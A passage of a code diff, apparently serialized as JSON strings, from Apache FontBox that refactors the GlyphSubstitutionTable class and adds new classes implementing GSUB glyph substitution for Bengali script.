lookupTable.subTables)", + "+ for (LookupSubTable lookupSubtable : lookupTable.getSubTables())", + " {", + "- int coverageIndex = lookupSubtable.coverageTable.getCoverageIndex(gid);", + "+ int coverageIndex = lookupSubtable.getCoverageTable().getCoverageIndex(gid);", + " if (coverageIndex >= 0)", + "@@ -544,208 +673,15 @@ public class GlyphSubstitutionTable extends TTFTable", + "- RangeRecord readRangeRecord(TTFDataStream data) throws IOException", + "- {", + "- RangeRecord rangeRecord = new RangeRecord();", + "- rangeRecord.startGlyphID = data.readUnsignedShort();", + "- rangeRecord.endGlyphID = data.readUnsignedShort();", + "- rangeRecord.startCoverageIndex = data.readUnsignedShort();", + "- return rangeRecord;", + "- }", + "-", + "- static class ScriptRecord", + "- {", + "- // https://www.microsoft.com/typography/otspec/scripttags.htm", + "- String scriptTag;", + "- ScriptTable scriptTable;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"ScriptRecord[scriptTag=%s]\", scriptTag);", + "- }", + "- }", + "-", + "- static class ScriptTable", + "+ public Map, Integer>> getRawGSubData()", + " {", + "- LangSysTable defaultLangSysTable;", + "- LinkedHashMap langSysTables;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"ScriptTable[hasDefault=%s,langSysRecordsCount=%d]\",", + "- defaultLangSysTable != null, langSysTables.size());", + "- }", + "+ return rawGSubData;", + " }", + "- static class LangSysRecord", + "+ private RangeRecord readRangeRecord(TTFDataStream data) throws IOException", + " {", + "- // https://www.microsoft.com/typography/otspec/languagetags.htm", + "- String langSysTag;", + "- LangSysTable langSysTable;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"LangSysRecord[langSysTag=%s]\", langSysTag);", + "- }", + "+ int startGlyphID = data.readUnsignedShort();", + "+ int endGlyphID = data.readUnsignedShort();", + "+ int startCoverageIndex = data.readUnsignedShort();", + "+ return new RangeRecord(startGlyphID, endGlyphID, startCoverageIndex);", + " }", + "- static class LangSysTable", + "- {", + "- int requiredFeatureIndex;", + "- int[] featureIndices;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"LangSysTable[requiredFeatureIndex=%d]\", requiredFeatureIndex);", + "- }", + "- }", + "-", + "- static class FeatureRecord", + "- {", + "- String featureTag;", + "- FeatureTable featureTable;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"FeatureRecord[featureTag=%s]\", featureTag);", + "- }", + "- }", + "-", + "- static class FeatureTable", + "- {", + "- int[] lookupListIndices;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"FeatureTable[lookupListIndiciesCount=%d]\",", + "- lookupListIndices.length);", + "- }", + "- }", + "-", + "- static class LookupTable", + "- {", + "- int lookupType;", + "- int lookupFlag;", + "- int markFilteringSet;", + "- LookupSubTable[] subTables;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"LookupTable[lookupType=%d,lookupFlag=%d,markFilteringSet=%d]\",", + "- lookupType, lookupFlag, markFilteringSet);", + "- }", + "- }", + "-", + "- static abstract class LookupSubTable", + "- {", + "- int substFormat;", + "- CoverageTable coverageTable;", + "-", + "- abstract int doSubstitution(int gid, int coverageIndex);", + "- }", + "-", + "- static class LookupTypeSingleSubstFormat1 extends LookupSubTable", + "- {", + "- short deltaGlyphID;", + "-", + "- @Override", + "- int doSubstitution(int gid, int coverageIndex)", + "- {", + "- return coverageIndex < 0 ? gid : gid + deltaGlyphID;", + "- }", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"LookupTypeSingleSubstFormat1[substFormat=%d,deltaGlyphID=%d]\",", + "- substFormat, deltaGlyphID);", + "- }", + "- }", + "-", + "- static class LookupTypeSingleSubstFormat2 extends LookupSubTable", + "- {", + "- int[] substituteGlyphIDs;", + "-", + "- @Override", + "- int doSubstitution(int gid, int coverageIndex)", + "- {", + "- return coverageIndex < 0 ? gid : substituteGlyphIDs[coverageIndex];", + "- }", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(", + "- \"LookupTypeSingleSubstFormat2[substFormat=%d,substituteGlyphIDs=%s]\",", + "- substFormat, Arrays.toString(substituteGlyphIDs));", + "- }", + "- }", + "-", + "- static abstract class CoverageTable", + "- {", + "- int coverageFormat;", + "-", + "- abstract int getCoverageIndex(int gid);", + "- }", + "-", + "- static class CoverageTableFormat1 extends CoverageTable", + "- {", + "- int[] glyphArray;", + "-", + "- @Override", + "- int getCoverageIndex(int gid)", + "- {", + "- return Arrays.binarySearch(glyphArray, gid);", + "- }", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"CoverageTableFormat1[coverageFormat=%d,glyphArray=%s]\",", + "- coverageFormat, Arrays.toString(glyphArray));", + "- }", + "- }", + "-", + "- static class CoverageTableFormat2 extends CoverageTable", + "- {", + "- RangeRecord[] rangeRecords;", + "-", + "- @Override", + "- int getCoverageIndex(int gid)", + "- {", + "- for (RangeRecord rangeRecord : rangeRecords)", + "- {", + "- if (rangeRecord.startGlyphID <= gid && gid <= rangeRecord.endGlyphID)", + "- {", + "- return rangeRecord.startCoverageIndex + gid - rangeRecord.startGlyphID;", + "- }", + "- }", + "- return -1;", + "- }", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"CoverageTableFormat2[coverageFormat=%d]\", coverageFormat);", + "- }", + "- }", + "-", + "- static class RangeRecord", + "- {", + "- int startGlyphID;", + "- int endGlyphID;", + "- int startCoverageIndex;", + "-", + "- @Override", + "- public String toString()", + "- {", + "- return String.format(\"RangeRecord[startGlyphID=%d,endGlyphID=%d,startCoverageIndex=%d]\",", + "- startGlyphID, endGlyphID, startCoverageIndex);", + "- }", + "- }", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "index 7731b3342..1e7b4880a 100755", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "@@ -1130,2 +1130,8 @@ public final class TTFSubsetter", + " }", + "+", + "+ public void addGlyphIds(Set allGlyphIds)", + "+ {", + "+ glyphIds.addAll(allGlyphIds);", + "+ }", + "+", + " }", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "index 3867ede86..8edcc6188 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TrueTypeFont.java", + "@@ -567,3 +567,3 @@ public class TrueTypeFont implements FontBoxFont, Closeable", + " {", + "- return new SubstitutingCmapLookup(cmap, (GlyphSubstitutionTable) table,", + "+ return new SubstitutingCmapLookup(cmap, table,", + " Collections.unmodifiableList(enabledGsubFeatures));", + "@@ -656,2 +656,13 @@ public class TrueTypeFont implements FontBoxFont, Closeable", + "+ public Map, Integer>> getGlyphSubstitutionMap() throws IOException", + "+ {", + "+ GlyphSubstitutionTable table = getGsub();", + "+ if (table == null)", + "+ {", + "+ return Collections.emptyMap();", + "+ }", + "+", + "+ return table.getRawGSubData();", + "+ }", + "+", + " /**", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", + "new file mode 100644", + "index 000000000..e24828d1b", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/CompoundCharacterTokenizer.java", + "@@ -0,0 +1,102 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import java.util.ArrayList;", + "+import java.util.List;", + "+import java.util.Set;", + "+import java.util.regex.Matcher;", + "+import java.util.regex.Pattern;", + "+", + "+/**", + "+ * Takes in the given text having compound-glyphs to substitute, and splits it into chunks consisting of parts that", + "+ * should be substituted and the ones that can be processed normally.", + "+ * ", + "+ * @author Palash Ray", + "+ * ", + "+ */", + "+public class CompoundCharacterTokenizer", + "+{", + "+", + "+ private final Pattern regexExpression;", + "+", + "+ public CompoundCharacterTokenizer(Set compoundWords)", + "+ {", + "+ regexExpression = Pattern.compile(getRegexFromTokens(compoundWords));", + "+ }", + "+", + "+ public CompoundCharacterTokenizer(String singleRegex)", + "+ {", + "+ regexExpression = Pattern.compile(singleRegex);", + "+ }", + "+", + "+ public List tokenize(String text)", + "+ {", + "+ List tokens = new ArrayList();", + "+", + "+ Matcher regexMatcher = regexExpression.matcher(text);", + "+", + "+ int lastIndexOfPrevMatch = 0;", + "+", + "+ while (regexMatcher.find())", + "+ {", + "+", + "+ int beginIndexOfNextMatch = regexMatcher.start();", + "+", + "+ String prevToken = text.substring(lastIndexOfPrevMatch, beginIndexOfNextMatch);", + "+", + "+ if (prevToken.length() > 0)", + "+ {", + "+ tokens.add(prevToken);", + "+ }", + "+", + "+ String currentMatch = regexMatcher.group();", + "+", + "+ tokens.add(currentMatch);", + "+", + "+ lastIndexOfPrevMatch = regexMatcher.end();", + "+", + "+ }", + "+", + "+ String tail = text.substring(lastIndexOfPrevMatch, text.length());", + "+", + "+ if (tail.length() > 0)", + "+ {", + "+ tokens.add(tail);", + "+ }", + "+", + "+ return tokens;", + "+ }", + "+", + "+ private String getRegexFromTokens(Set compoundWords)", + "+ {", + "+ StringBuilder sb = new StringBuilder();", + "+", + "+ for (String compoundWord : compoundWords)", + "+ {", + "+ sb.append(\"(\");", + "+ sb.append(compoundWord);", + "+ sb.append(\")|\");", + "+ }", + "+", + "+ sb.setLength(sb.length() - 1);", + "+", + "+ return sb.toString();", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java", + "new file mode 100644", + "index 000000000..fcb91afa2", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitter.java", + "@@ -0,0 +1,33 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import java.util.List;", + "+", + "+/**", + "+ * This class splits an array of GlyphIds with a prospective match.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public interface GlyphArraySplitter", + "+{", + "+", + "+ List> split(List glyphIds);", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java", + "new file mode 100644", + "index 000000000..8cf324fb0", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphArraySplitterRegexImpl.java", + "@@ -0,0 +1,95 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import java.util.ArrayList;", + "+import java.util.HashSet;", + "+import java.util.List;", + "+import java.util.Set;", + "+", + "+/**", + "+ * This is an in-efficient implementation based on regex, which helps split the array.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class GlyphArraySplitterRegexImpl implements GlyphArraySplitter", + "+{", + "+ private static final String GLYPH_ID_SEPARATOR = \"_\";", + "+", + "+ private final CompoundCharacterTokenizer compoundCharacterTokenizer;", + "+", + "+ public GlyphArraySplitterRegexImpl(Set> matchers)", + "+ {", + "+ compoundCharacterTokenizer = new CompoundCharacterTokenizer(getMatchersAsStrings(matchers));", + "+ }", + "+", + "+ @Override", + "+ public List> split(List glyphIds)", + "+ {", + "+ String originalGlyphsAsText = convertGlyphIdsToString(glyphIds);", + "+ List tokens = compoundCharacterTokenizer.tokenize(originalGlyphsAsText);", + "+", + "+ List> modifiedGlyphs = new ArrayList<>();", + "+", + "+ for (String token : tokens)", + "+ {", + "+ modifiedGlyphs.add(convertGlyphIdsToList(token));", + "+ }", + "+", + "+ return modifiedGlyphs;", + "+ }", + "+", + "+ private Set getMatchersAsStrings(Set> matchers)", + "+ {", + "+ Set stringMatchers = new HashSet<>(matchers.size());", + "+ for (List glyphIds : matchers)", + "+ {", + "+ stringMatchers.add(convertGlyphIdsToString(glyphIds));", + "+ }", + "+ return stringMatchers;", + "+ }", + "+", + "+ private String convertGlyphIdsToString(List glyphIds)", + "+ {", + "+ StringBuilder sb = new StringBuilder(20);", + "+ sb.append(GLYPH_ID_SEPARATOR);", + "+ for (Integer glyphId : glyphIds)", + "+ {", + "+ sb.append(glyphId).append(GLYPH_ID_SEPARATOR);", + "+ }", + "+ return sb.toString();", + "+ }", + "+", + "+ private List convertGlyphIdsToList(String glyphIdsAsString)", + "+ {", + "+ List gsubProcessedGlyphsIds = new ArrayList<>();", + "+", + "+ for (String glyphId : glyphIdsAsString.split(GLYPH_ID_SEPARATOR))", + "+ {", + "+ if (glyphId.trim().length() == 0)", + "+ {", + "+ continue;", + "+ }", + "+ gsubProcessedGlyphsIds.add(Integer.valueOf(glyphId));", + "+ }", + "+", + "+ return gsubProcessedGlyphsIds;", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "new file mode 100644", + "index 000000000..7fb2c0eea", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GlyphSubstitutionDataExtractor.java", + "@@ -0,0 +1,235 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import java.util.ArrayList;", + "+import java.util.Arrays;", + "+import java.util.Collections;", + "+import java.util.LinkedHashMap;", + "+import java.util.List;", + "+import java.util.Map;", + "+", + "+import org.apache.commons.logging.Log;", + "+import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.table.common.CoverageTable;", + "+import org.apache.fontbox.ttf.table.common.FeatureListTable;", + "+import org.apache.fontbox.ttf.table.common.FeatureRecord;", + "+import org.apache.fontbox.ttf.table.common.LangSysTable;", + "+import org.apache.fontbox.ttf.table.common.LookupListTable;", + "+import org.apache.fontbox.ttf.table.common.LookupSubTable;", + "+import org.apache.fontbox.ttf.table.common.LookupTable;", + "+import org.apache.fontbox.ttf.table.common.ScriptTable;", + "+import org.apache.fontbox.ttf.table.gsub.LigatureSetTable;", + "+import org.apache.fontbox.ttf.table.gsub.LigatureTable;", + "+import org.apache.fontbox.ttf.table.gsub.LookupTypeLigatureSubstitutionSubstFormat1;", + "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat1;", + "+import org.apache.fontbox.ttf.table.gsub.LookupTypeSingleSubstFormat2;", + "+", + "+/**", + "+ * This class has utility methods to extract meaningful data from the highly obfuscated GSUB Tables. This data is then", + "+ * used to determine which combination of Glyphs or words have to be replaced.", + "+ * ", + "+ * @author Palash Ray", + "+ * ", + "+ */", + "+public class GlyphSubstitutionDataExtractor", + "+{", + "+", + "+ private static final Log LOG = LogFactory.getLog(GlyphSubstitutionDataExtractor.class);", + "+", + "+ private static final String[] SUPPORTED_LANGUAGES = { \"bng2\", \"beng\" };", + "+", + "+ public Map, Integer>> getGsubData(Map scriptList,", + "+ FeatureListTable featureListTable, LookupListTable lookupListTable)", + "+ {", + "+", + "+ ScriptTable scriptTable = getSupportedLanguage(scriptList);", + "+", + "+ if (scriptTable == null)", + "+ {", + "+ return Collections.emptyMap();", + "+ }", + "+", + "+ Map, Integer>> gsubData = new LinkedHashMap<>();", + "+ // the starting point is really the scriptTags", + "+ if (scriptTable.getDefaultLangSysTable() != null)", + "+ {", + "+ populateGsubData(gsubData, scriptTable.getDefaultLangSysTable(), featureListTable,", + "+ lookupListTable);", + "+ }", + "+ for (LangSysTable langSysTable : scriptTable.getLangSysTables().values())", + "+ {", + "+ populateGsubData(gsubData, langSysTable, featureListTable, lookupListTable);", + "+ }", + "+ return Collections.unmodifiableMap(gsubData);", + "+ }", + "+", + "+ private ScriptTable getSupportedLanguage(Map scriptList)", + "+ {", + "+ for (String supportedLanguage : SUPPORTED_LANGUAGES)", + "+ {", + "+ if (scriptList.containsKey(supportedLanguage))", + "+ {", + "+ return scriptList.get(supportedLanguage);", + "+ }", + "+ }", + "+ return null;", + "+ }", + "+", + "+ private void populateGsubData(Map, Integer>> gsubData,", + "+ LangSysTable langSysTable, FeatureListTable featureListTable,", + "+ LookupListTable lookupListTable)", + "+ {", + "+ for (int featureIndex : langSysTable.getFeatureIndices())", + "+ {", + "+ FeatureRecord featureRecord = featureListTable.getFeatureRecords()[featureIndex];", + "+ populateGsubData(gsubData, featureRecord, lookupListTable);", + "+ }", + "+ }", + "+", + "+ private void populateGsubData(Map, Integer>> gsubData,", + "+ FeatureRecord featureRecord, LookupListTable lookupListTable)", + "+ {", + "+", + "+ LOG.debug(\"*********** extracting GSUB data for the feature: \"", + "+ + featureRecord.getFeatureTag());", + "+", + "+ Map, Integer> glyphSubstitutionMap = new LinkedHashMap<>();", + "+ for (int lookupIndex : featureRecord.getFeatureTable().getLookupListIndices())", + "+ {", + "+ LookupTable lookupTable = lookupListTable.getLookups()[lookupIndex];", + "+ extractData(glyphSubstitutionMap, lookupTable);", + "+ }", + "+ gsubData.put(featureRecord.getFeatureTag(),", + "+ Collections.unmodifiableMap(glyphSubstitutionMap));", + "+ }", + "+", + "+ private void extractData(Map, Integer> glyphSubstitutionMap,", + "+ LookupTable lookupTable)", + "+ {", + "+", + "+ for (LookupSubTable lookupSubTable : lookupTable.getSubTables())", + "+ {", + "+ if (lookupSubTable instanceof LookupTypeLigatureSubstitutionSubstFormat1)", + "+ {", + "+ extractDataFromLigatureSubstitutionSubstFormat1Table(glyphSubstitutionMap,", + "+ (LookupTypeLigatureSubstitutionSubstFormat1) lookupSubTable);", + "+ }", + "+ else if (lookupSubTable instanceof LookupTypeSingleSubstFormat1)", + "+ {", + "+ extractDataFromSingleSubstTableFormat1Table(glyphSubstitutionMap,", + "+ (LookupTypeSingleSubstFormat1) lookupSubTable);", + "+ }", + "+ else if (lookupSubTable instanceof LookupTypeSingleSubstFormat2)", + "+ {", + "+ extractDataFromSingleSubstTableFormat2Table(glyphSubstitutionMap,", + "+ (LookupTypeSingleSubstFormat2) lookupSubTable);", + "+ }", + "+ else", + "+ {", + "+ LOG.warn(\"The type \" + lookupSubTable + \" is not yet supported, will be ignored\");", + "+ }", + "+ }", + "+", + "+ }", + "+", + "+ private void extractDataFromSingleSubstTableFormat1Table(", + "+ Map, Integer> glyphSubstitutionMap,", + "+ LookupTypeSingleSubstFormat1 singleSubstTableFormat1)", + "+ {", + "+ CoverageTable coverageTable = singleSubstTableFormat1.getCoverageTable();", + "+ for (int i = 0; i < coverageTable.getSize(); i++)", + "+ {", + "+ int coverageGlyphId = coverageTable.getGlyphId(i);", + "+ int substituteGlyphId = coverageGlyphId + singleSubstTableFormat1.getDeltaGlyphID();", + "+ putNewSubstitutionEntry(glyphSubstitutionMap, substituteGlyphId,", + "+ Arrays.asList(coverageGlyphId));", + "+ }", + "+ }", + "+", + "+ private void extractDataFromSingleSubstTableFormat2Table(", + "+ Map, Integer> glyphSubstitutionMap,", + "+ LookupTypeSingleSubstFormat2 singleSubstTableFormat2)", + "+ {", + "+", + "+ CoverageTable coverageTable = singleSubstTableFormat2.getCoverageTable();", + "+", + "+ if (coverageTable.getSize() != singleSubstTableFormat2.getSubstituteGlyphIDs().length)", + "+ {", + "+ throw new IllegalArgumentException(", + "+ \"The no. coverage table entries should be the same as the size of the substituteGlyphIDs\");", + "+ }", + "+", + "+ for (int i = 0; i < coverageTable.getSize(); i++)", + "+ {", + "+ int coverageGlyphId = coverageTable.getGlyphId(i);", + "+ int substituteGlyphId = coverageGlyphId", + "+ + singleSubstTableFormat2.getSubstituteGlyphIDs()[i];", + "+ putNewSubstitutionEntry(glyphSubstitutionMap, substituteGlyphId,", + "+ Arrays.asList(coverageGlyphId));", + "+ }", + "+ }", + "+", + "+ private void extractDataFromLigatureSubstitutionSubstFormat1Table(", + "+ Map, Integer> glyphSubstitutionMap,", + "+ LookupTypeLigatureSubstitutionSubstFormat1 ligatureSubstitutionTable)", + "+ {", + "+", + "+ for (LigatureSetTable ligatureSetTable : ligatureSubstitutionTable.getLigatureSetTables())", + "+ {", + "+ for (LigatureTable ligatureTable : ligatureSetTable.getLigatureTables())", + "+ {", + "+ extractDataFromLigatureTable(glyphSubstitutionMap, ligatureTable);", + "+ }", + "+", + "+ }", + "+", + "+ }", + "+", + "+ private void extractDataFromLigatureTable(Map, Integer> glyphSubstitutionMap,", + "+ LigatureTable ligatureTable)", + "+ {", + "+", + "+ List glyphsToBeSubstituted = new ArrayList<>();", + "+", + "+ for (int componentGlyphID : ligatureTable.getComponentGlyphIDs())", + "+ {", + "+ glyphsToBeSubstituted.add(componentGlyphID);", + "+ }", + "+", + "+ LOG.debug(\"glyphsToBeSubstituted: \" + glyphsToBeSubstituted);", + "+", + "+ putNewSubstitutionEntry(glyphSubstitutionMap, ligatureTable.getLigatureGlyph(),", + "+ glyphsToBeSubstituted);", + "+", + "+ }", + "+", + "+ private void putNewSubstitutionEntry(Map, Integer> glyphSubstitutionMap,", + "+ int newGlyph, List glyphsToBeSubstituted)", + "+ {", + "+ Integer oldValue = glyphSubstitutionMap.put(glyphsToBeSubstituted, newGlyph);", + "+", + "+ if (oldValue != null)", + "+ {", + "+ String message = \"For the newGlyph: \" + newGlyph + \", newValue: \"", + "+ + glyphsToBeSubstituted + \" is trying to override the oldValue: \" + oldValue;", + "+ LOG.warn(message);", + "+ }", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "new file mode 100644", + "index 000000000..8e3287ed7", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorker.java", + "@@ -0,0 +1,35 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import java.util.List;", + "+", + "+/**", + "+ * This class is responsible for replacing GlyphIDs with new ones according to the GSUB tables. Each language should", + "+ * have an implementation of this.", + "+ * ", + "+ * @author Palash Ray", + "+ * ", + "+ */", + "+public interface GsubWorker", + "+{", + "+ List substituteGlyphs(List originalGlyphIds);", + "+", + "+ List repositionGlyphs(List originalGlyphIds);", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "new file mode 100644", + "index 000000000..d44ba3a50", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "@@ -0,0 +1,148 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.gsub;", + "+", + "+import java.util.ArrayList;", + "+import java.util.Arrays;", + "+import java.util.Collections;", + "+import java.util.List;", + "+import java.util.Map;", + "+", + "+import org.apache.commons.logging.Log;", + "+import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.CmapLookup;", + "+", + "+/**", + "+ * ", + "+ * Bengali-specific implementation of GSUB system", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class GsubWorkerForBengali implements GsubWorker", + "+{", + "+", + "+ private static final Log LOG = LogFactory.getLog(GsubWorkerForBengali.class);", + "+", + "+ /**", + "+ * This sequence is very important. This has been taken from https://docs.microsoft.com/en-us/typography/script-development/bengali", + "+ */", + "+ private static final List FEATURES_IN_ORDER = Arrays.asList(\"locl\", \"nukt\", \"akhn\",", + "+ \"rphf\", \"blwf\", \"half\", \"pstf\", \"vatu\", \"cjct\", \"init\", \"pres\", \"abvs\", \"blws\", \"psts\",", + "+ \"haln\", \"calt\");", + "+", + "+ private static final char[] BEFORE_HALF_CHARS = new char[] { '\\u09BF', '\\u09C7', '\\u09C8' };", + "+", + "+ private final Map, Integer>> glyphSubstitutionMap;", + "+", + "+ private final List beforeHalfGlyphIds;", + "+", + "+ public GsubWorkerForBengali(CmapLookup cmapLookup,", + "+ Map, Integer>> glyphSubstitutionMap)", + "+ {", + "+ this.glyphSubstitutionMap = glyphSubstitutionMap;", + "+ beforeHalfGlyphIds = getBeforeHalfGlyphIds(cmapLookup);", + "+ }", + "+", + "+ @Override", + "+ public List substituteGlyphs(List originalGlyphIds)", + "+ {", + "+ List intermediateGlyphsFromGsub = originalGlyphIds;", + "+", + "+ for (String feature : FEATURES_IN_ORDER)", + "+ {", + "+ if (!glyphSubstitutionMap.containsKey(feature))", + "+ {", + "+ LOG.debug(\"the feature \" + feature + \" was not found\");", + "+ continue;", + "+ }", + "+", + "+ LOG.debug(\"applying the feature \" + feature);", + "+", + "+ Map, Integer> featureMap = glyphSubstitutionMap.get(feature);", + "+", + "+ intermediateGlyphsFromGsub = applyGsubFeature(featureMap, intermediateGlyphsFromGsub);", + "+ }", + "+", + "+ return intermediateGlyphsFromGsub;", + "+ }", + "+", + "+ @Override", + "+ public List repositionGlyphs(List originalGlyphIds)", + "+ {", + "+ List repositionedGlyphIds = new ArrayList<>(originalGlyphIds);", + "+", + "+ for (int index = 1; index < originalGlyphIds.size(); index++)", + "+ {", + "+ int glyphId = originalGlyphIds.get(index);", + "+ if (beforeHalfGlyphIds.contains(glyphId))", + "+ {", + "+ int previousGlyphId = originalGlyphIds.get(index - 1);", + "+ repositionedGlyphIds.set(index, previousGlyphId);", + "+ repositionedGlyphIds.set(index - 1, glyphId);", + "+ }", + "+ }", + "+ return repositionedGlyphIds;", + "+ }", + "+", + 